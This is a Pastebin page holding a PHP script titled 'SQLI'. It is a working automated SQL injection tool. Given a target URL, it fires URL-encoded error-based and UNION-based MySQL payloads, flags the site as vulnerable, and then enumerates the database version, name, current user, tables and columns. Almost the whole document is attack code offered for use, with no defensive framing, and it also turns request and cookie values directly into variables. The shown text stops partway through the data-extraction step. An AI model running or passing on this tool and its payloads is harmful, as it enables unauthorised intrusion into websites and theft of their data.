API tools faq
paste
Advertisement
AZZATSSINS_CYBERSERK

SQLI

AZZATSSINS_CYBERSERK
Jun 27th, 2016
376
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 24.97 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. echo "<title>SQLI</title>";
  3.  
  4.  
  5. $a = array(
  6. '%27%20AND%20%28SELECT%208041%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20%28CASE%20WHEN%20%288041%3D8041%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR',
  7. '%27%29%20AND%20%28SELECT%208041%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20%28CASE%20WHEN%20%288041%3D8041%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM',
  8. '%20AND%20%28SELECT%208041%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20%28CASE%20WHEN%20%288041%3D8041%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
  9. '%29%20AND%20%28SELECT%208041%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20%28CASE%20WHEN%20%288041%3D8041%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609'
  10. );
  11. $b = array(
  12. //UNION queries:
  13. '%20-6863%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20CONCAT%280x3a6f79753a%2C0x4244764877697569706b%2C0x3a70687a3a%29%2C%20NULL%2C%20NULL%2C%20NULL%23', //10 cols
  14. '%20-6863%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20CONCAT%280x3a6f79753a%2C0x4244764877697569706b%2C0x3a70687a3a%29%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23', //8 cols
  15. '%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20CONCAT%280x3a6f79753a%2C0x4244764877697569706b%2C0x3a70687a3a%29%2C%20NULL%23', //8cols v2
  16. '%20-6863%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%280x3a6f79753a%2C0x4244764877697569706b%2C0x3a70687a3a%29%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23',//6 cols
  17. );
  18.  
  19.  
  20.  
  21. //globals
  22. $string= 'You have an error in your SQL syntax';
  23. $string2= 'supplied argument is not a valid MySQL';
  24. $string3= ':oyu:';
  25. $string4= 'dummy request';
  26. @$url2 = "$url\")'";
  27. $html = @file_get_contents("$url2");
  28. $pos = strpos($html, $string);
  29.    
  30.  
  31. //--------------------------------------------------------------------------------------------------------------
  32.  
  33.  
  34.     foreach ($_GET as $key => $val) $$key=htmldecode($val);
  35.     foreach ($_POST as $key => $val) $$key=htmldecode($val);
  36.     foreach ($_COOKIE as $key => $val) $$key=htmldecode($val);
  37.  
  38.    
  39.    
  40. switch (@$frame){
  41.         case 1: frame1(); break;
  42.         case 2: frame2(); break;
  43.         case 3: frame3(); break;
  44.         case 4: frame4(); break;
  45.         case 5: frame5(); break;
  46.         default:
  47.             switch(@$action){
  48.                 default: frameset();
  49.  
  50.             }
  51.         }
  52.  
  53. function htmldecode($str){
  54.     if (is_string($str)){
  55.        if (get_magic_quotes_gpc()) return stripslashes(html_entity_decode($str));
  56.        else return html_entity_decode($str);
  57.     } else return $str;
  58. }
  59. function html_header($plus=""){
  60.  
  61. echo "
  62. <html>
  63. <head>
  64. <meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">
  65.  
  66. $plus
  67. <style>
  68.    body {
  69.        font-family : Arial;
  70.  
  71.        font-weight : normal;
  72.        color: green;
  73.        background-color: black;
  74.    }
  75.     </style>
  76. </head>
  77.  
  78. ";
  79. }
  80.  
  81. //------------------------------------------------------------------------------------------------------------------
  82.  
  83. //Functions for queries and stuffs
  84.  
  85. if(@$mode_eb == 1){
  86. @$version = "$url+%27%20AND%20%28SELECT%206722%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
  87. @$database = "$url+%27%20AND%20%28SELECT%206870%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
  88. @$usuario = "$url+%27%20AND%20%28SELECT%202525%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
  89.  
  90.  
  91. }elseif(@$mode_eb == 2){
  92. @$version = "$url+%27%29%20AND%20%28SELECT%206722%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
  93. @$database = "$url+%27%29%20AND%20%28SELECT%206870%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
  94. @$usuario = "$url+%27%29%20AND%20%28SELECT%202525%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
  95.  
  96.  
  97. }elseif(@$mode_eb == 3){
  98. @$version = "$url+%20AND%20%28SELECT%206722%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
  99. @$database = "$url+%20AND%20%28SELECT%206870%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
  100. @$usuario = "$url+%20AND%20%28SELECT%202525%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
  101.  
  102.  
  103. }elseif(@$mode_eb == 4){
  104. @$version = "$url+%29%20AND%20%28SELECT%206722%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
  105. @$database = "$url+%29%20AND%20%28SELECT%206870%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
  106. @$usuario = "$url+%29%20AND%20%28SELECT%202525%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
  107.  
  108.  
  109.  
  110. }
  111.  
  112.     @$versio = @file_get_contents("$version");
  113.     @$databas = @file_get_contents("$database");
  114.     @$usuari = @file_get_contents("$usuario");
  115.  
  116.  
  117.  
  118.  
  119.  
  120.  
  121.  
  122.  
  123. function hexEncode($str){
  124.     if(is_null($str)){
  125.     return FALSE;
  126.    }
  127.     $hexStr = "";
  128.      for($i=0;isset($str[$i]);$i++){
  129.        $char = dechex(ord($str[$i]));
  130.        $hexStr .= $char;
  131.      }
  132.       return "0x".$hexStr;
  133.      }
  134. function asciiEncode($str){
  135.       if(!preg_match("/^0x[A-Fa-f0-9]+/",$str)){
  136.        return FALSE;   //Not a hex string
  137.       }
  138.        $str = substr($str,2);
  139.      $asciiString = "";
  140.       for($i=0;isset($str[$i]);$i+=2){
  141.        $hexChar = substr($str,$i,2);
  142.         $asciiString .= chr(hexdec($hexChar));
  143.       }
  144.    return $asciiString;
  145.   }
  146. function GetBetween($content){
  147.     $r = explode(":oyu:", $content);
  148.     if (isset($r[1])){
  149.         $r = explode(":phz:", $r[1]);
  150.         return $r[0];
  151.   }
  152.   return '';
  153. }
  154.  
  155. function mode_comaprison_eb($detectar_t){
  156.  
  157. if($detectar_t == @$detectar)
  158. {return "vulnerable";}
  159. }
  160. function mode_comaprison_uq($detectar_t){
  161. //UNION query:
  162. if($detectar_t == @$detectar2)
  163. {return "vulnerable";}//10 cols
  164. }
  165.  
  166.  
  167.  
  168. function frameset(){
  169.    
  170.     html_header();
  171.        
  172.     echo "
  173.    <frameset rows=\"*,25%\" framespacing=\"0\" frameborder=\"0\">
  174.             <frame src=\"".$_SERVER['PHP_SELF']."?frame=1\" name=frame1 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
  175.         <frameset cols=\"33%,*,33%\" framespacing=\"0\" frameborder=\"0\">
  176.            <frame src=\"".$_SERVER['PHP_SELF']."?frame=2\" name=frame2 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
  177.        <frame src=\"".$_SERVER['PHP_SELF']."?frame=3\" name=frame3 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
  178.             <frame src=\"".$_SERVER['PHP_SELF']."?frame=4\" name=frame4 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
  179.        </frameset>
  180.         <!--    <frame src=\"".$_SERVER['PHP_SELF']."?frame=5\" name=frame5 border=\"0\" marginwidth=\"0\" marginheight=\"0\">!-->
  181.       </frameset>
  182.    ";
  183.     echo "</html>";
  184. }
  185. function frame1(){
  186.             global $string2, $string, $string3, $pos, $url2, $html, $mode_eb, $a, $b;
  187.              global $action, $detectar_t;
  188.     html_header();
  189.      echo "<body>\n";
  190.  
  191.    
  192.  
  193. echo "
  194. <center>
  195. <tr><td>
  196.  
  197. <center>
  198. <form action=\" ".$_SERVER['PHP_SELF']."?frame=1\" method=\"post\" name=\"forma\" id=\"forma\">
  199. url: <input type=\"text\" name=\"url\" id=\"url\" size=\"65\"/>
  200. <input type=\"submit\" name=\"forma\" id=\"form\" value=\"search\"/>
  201. </form>
  202. </center>
  203. ";
  204.  
  205. if(isset($_POST['forma']) && $_POST['forma']=='search')
  206. {
  207.  
  208.     $url = $_POST["url"];
  209.     echo "Testing: $url<br><br>";
  210.  
  211.         $as=1;
  212.         foreach($a as $detectar){
  213.  
  214.         $url3 = "$url+$detectar";
  215.         @$html2 = file_get_contents("$url3");
  216.  
  217.         if(strpos($html2, @$string3)==true)
  218.         {
  219.             if(mode_comaprison_eb($detectar) == "vulnerable"){
  220.  
  221.             }
  222.         $mode_eb = $as;
  223.        
  224.         echo "<font color=blue>Detected: ERROR BASED inyection =)</font> <br>QUERY: <font size=2 color=red>$detectar</font><br><br>";
  225.         @$eb_i = 1;
  226.        
  227.         }
  228.         $as++;
  229.        
  230.         }
  231.         if (@$eb_i ==1){
  232.                 echo "
  233.                 <center>
  234.     <form action=\"".$_SERVER['PHP_SELF']."?frame=2\" method=\"post\" target=\"frame2\" name=\"tablas\" id=\"tablas\">
  235.     <input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
  236.     <input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_eb\"/>
  237.     <input type=\"submit\" name=\"tablas\" id=\"tablas\" value=\"GET Exploit\"/>
  238.    
  239.     </form>
  240.     </center>
  241.     ";}
  242.  
  243.         foreach($b as $detectar2){
  244.         $url6 = "$url+$detectar2";
  245.         @$html8 = file_get_contents("$url6");  
  246.        
  247.         if(strpos(@$html8, @$string3)==true){
  248.             if(mode_comaprison_uq($detectar2) == "vulnerable"){
  249.                 }
  250.            
  251.         echo "<center><font color=blue>Detected: UNION query inyection =)</font> <br>QUERY: <font size=2 color=red>$detectar2</font><br><br></center>";
  252.         $uq_i = 1;
  253.         }      
  254.        
  255.         }
  256.         if((@$eb_i == 0) && (@$uq_i==0))
  257.         {
  258.         echo "<center><br><font color=red>No injection point founded =(</font><br><br></center>";
  259.         }
  260.  
  261.  
  262. }
  263.      echo "</body>\n</html>";  
  264.  
  265. }
  266. function frame2(){
  267.     html_header();
  268. global $string2, $string, $string3, $pos, $url2, $html;
  269. global $action, $detectar_t;
  270.  
  271. if(isset($_POST['tablas']) && $_POST['tablas']=='GET Exploit')
  272. {
  273.    
  274.  
  275.     $url = $_POST["url"];
  276.     $mode_eb = $_POST["lol"];
  277.    
  278. if ($mode_eb==1){
  279.     @$tablas2 = "$url+%27%20AND%20%28SELECT%203830%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
  280.     }
  281. elseif ($mode_eb==2){
  282.     @$tablas2 = "$url+%27%29%20AND%20%28SELECT%203830%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
  283.     }
  284. elseif ($mode_eb==3){
  285.     @$tablas2 = "$url+%20AND%20%28SELECT%203830%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
  286.     }
  287. elseif ($mode_eb==4){
  288.     @$tablas2 = "$url+%29%20AND%20%28SELECT%203830%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
  289.     }
  290. $tabla = @file_get_contents("$tablas2");   
  291.  
  292.  
  293.     $i = -1;  
  294.      
  295.      
  296. echo "
  297.     <form action=\"".$_SERVER['PHP_SELF']."?frame=3\" target=\"frame3\" method=\"post\" name=\"columnas\" id=\"columnas\">
  298.     <input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
  299.     <select name=\"num\" id=\"num\>";
  300.     while ($i <= (GetBetween($tabla)-1)):
  301.    
  302.         if($mode_eb == 1){
  303.         @$_tablas = "%27%20AND%20%28SELECT%207288%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
  304. }elseif($mode_eb == 2){
  305.         @$_tablas = "%27%29%20AND%20%28SELECT%207288%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
  306. }elseif($mode_eb == 3){
  307.         @$_tablas = "%20AND%20%28SELECT%207288%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
  308. }elseif($mode_eb == 4){
  309.         @$_tablas = "%29%20AND%20%28SELECT%207288%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
  310. }
  311.     $nums_tablas = "$url+$_tablas";
  312.    
  313.     echo $nums_tablas;
  314.     $n_tabla = file_get_contents("$nums_tablas");
  315.    
  316.     $num = GetBetween($n_tabla);
  317.     echo "<option value=\"".hexEncode($num)."\">$num</option>";
  318.     $i++;
  319.     endwhile;
  320.  
  321.     echo "</select>";
  322.     echo"<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_eb\"/>";
  323.     echo "  <input type=\"submit\" name=\"columnas\" id=\"columnas\" value=\"columns\"/>";
  324.     echo "<form>";
  325.  
  326. }
  327. //STILL PLAYING WITH UNION QUERIES
  328.  
  329.  
  330.     }
  331. function frame3(){
  332. html_header();
  333. global $string2, $string, $string3, $pos, $url2, $html;
  334. global $action, $detectar_t;
  335.  
  336.  
  337. if(isset($_POST['columnas']) && $_POST['columnas']=='columns')
  338. {
  339.     $url = $_POST["url"];
  340.     $table_n = $_POST["num"];
  341.     $mode_eb = $_POST["lol"];
  342.    
  343.         if($mode_eb == 1){
  344. @$columna = "$url+%27%20AND%20%28SELECT%201906%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";       
  345. }elseif($mode_eb == 2){
  346. @$columna = "$url+%27%29%20AND%20%28SELECT%201906%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
  347. }elseif($mode_eb == 3){
  348. @$columna = "$url+%20AND%20%28SELECT%201906%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
  349. }elseif($mode_eb == 4){
  350.         @$columna = "$url+%29%20AND%20%28SELECT%201906%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
  351. }
  352.    
  353.  
  354.  
  355.  
  356.    
  357.     @$column = @file_get_contents("$columna");
  358.    
  359.    
  360.    
  361.  
  362. echo "
  363.     <form action=\"".$_SERVER['PHP_SELF']."?frame=4\" target=\"frame4\" method=\"post\" name=\"datas\" id=\"datas\">
  364.     <input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
  365.     <input type=\"hidden\" name=\"dz\" id=\"dz\" value=\"".asciiEncode($table_n)."\"/>";
  366.     $i = 0;
  367.    
  368.     echo"<select name=\"num2\" id=\"num2\">";
  369.     while ($i <= GetBetween($column)-1):
  370.         if($mode_eb == 1){
  371.             @$_column = "%27%20AND%20%28SELECT%205724%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28column_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
  372.     }elseif($mode_eb == 2){
  373.             @$_column = "%27%29%20AND%20%28SELECT%205724%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28column_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
  374.     }elseif($mode_eb == 3){
  375.             @$_column = "%20AND%20%28SELECT%205724%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28column_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
  376.     }elseif($mode_eb == 4){
  377.             @$_column = "%29%20AND%20%28SELECT%205724%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28column_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
  378.     }
  379.    
  380.    
  381.    
  382.    
  383.    
  384.     $nums_columna = "$url+$_column";
  385.     $n_tcolum = file_get_contents("$nums_columna");
  386.     $num2 = GetBetween($n_tcolum);
  387.     echo "<option value=\"$num2\">$num2</option>";
  388.     $i++;
  389.     endwhile;
  390.     echo "</select>";
  391.     echo"<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_eb\"/>";
  392.     echo "<input type=\"submit\" name=\"datas\" id=\"datas\" value=\"data\"/>";
  393.     echo "<form>";
  394.  
  395.    
  396. }
  397.  
  398.     }
  399. function frame4(){
  400.     html_header();
  401.    
  402. if(isset($_POST['datas']) && $_POST['datas']=='data')
  403. {
  404.     $url = $_POST["url"];
  405.     $num3 = $_POST["num2"];
  406.     $dz = $_POST["dz"];
  407.    
  408.     $mode_eb = $_POST["lol"];
  409.  
  410. if($mode_eb==1){
